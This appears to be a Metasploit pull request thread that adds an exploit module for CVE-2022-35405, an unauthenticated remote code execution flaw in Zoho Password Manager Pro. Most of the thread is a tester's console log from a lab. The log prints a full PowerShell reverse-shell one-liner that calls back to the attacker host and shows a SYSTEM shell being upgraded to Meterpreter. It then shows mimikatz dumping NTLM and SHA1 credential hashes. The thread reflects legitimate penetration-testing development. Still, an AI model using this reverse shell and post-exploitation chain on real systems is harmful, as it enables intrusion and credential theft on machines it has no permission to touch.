Add CVE-2022-35405 Zoho Password Manager Pro XML-RPC Unauthenticated RCE

[gwillcox-r7]

Add in exploit for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE

Setup for this can be found in the documentation and should be fairly simple to test. Let me know if you have any questions.

Successful exploitation should work as an unauthenticated user and should grant RCE as the SYSTEM user.

Verification

List the steps needed to make sure this thing works

• Follow the installation instructions in the documentation.
• Start msfconsole
• Do: use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
• Do: set RHOSTS [IP]
• Do: set payload [payload]
• Do: set LHOST [IP]
• Optional: set LPORT [local port to listen on]
• Do: exploit

[wvu]

Nice!

[gwillcox-r7]

Nice!

Thanks for putting up the PR that was the template for this work over at #14000 👍

[wvu]

Nice!

Thanks for putting up the PR that was the template for this work over at #14000 👍

I figured, hah!

[jheysel-r7]

Thanks for the great module Grant. Testing checks out and is as expected 👍

msf6 > use zoho_password_manager_pro_xml_rpc_rc
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > 
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set rhosts 172.16.199.134
rhosts => 172.16.199.134
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Windows Command for cmd/windows/reverse_powershell
[+] Successfully executed command: powershell -w hidden -nop -c $a='172.16.199.1';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $r=$os.BaseStream.EndRead($osread);      $s.Write($ob,0,$r);      $s.Flush();      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $r=$es.BaseStream.EndRead($esread);      $s.Write($eb,0,$r);      $s.Flush();      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    }    if ($p.ExitCode -ne $null) {        break;    }}
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.134:51626) at 2022-08-02 14:33:28 -0400


Shell Banner:
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\ManageEngine\PMP\bin>
-----


C:\Program Files\ManageEngine\PMP\bin>whoami
whoami
nt authority\system

C:\Program Files\ManageEngine\PMP\bin>background

Background session 1? [y/N]  y
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.199.1:4433
msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework

[*] Sending stage (222278 bytes) to 172.16.199.134
WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 2 opened (172.16.199.1:4433 -> 172.16.199.134:51861) at 2022-08-02 14:35:43 -0400
[*] Stopping exploit/multi/handler

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                      Connection
  --  ----  ----                     -----------                                                                      ----------
  1         shell cmd/windows        Shell Banner: Microsoft Windows [Version 10.0.19042.1706] (c) Microsoft Corp...  172.16.199.1:4444 -> 172.16.199.134:51626 (172.16.199.134)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-SF7KLAH                                            172.16.199.1:4433 -> 172.16.199.134:51861 (172.16.199.134)

msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > load kiwi
Loading extension kiwi...WARNING: Local file /Users/jheysel/rapid7/metasploit-framework/data/meterpreter/ext_server_kiwi.x64.dll is being used

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
msfuser   DESKTOP-SF7KLAH  a1074a69b1bde45403ab680504bbdd1a  034383fd4ee916f5a91d1483c31134a1e42cc84f

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-SF7KLAH$  WORKGROUP        (null)
msfuser           DESKTOP-SF7KLAH  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-sf7klah$  WORKGROUP        (null)
msfuser           DESKTOP-SF7KLAH  (null)


meterpreter >

[jheysel-r7]

Release Notes

This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE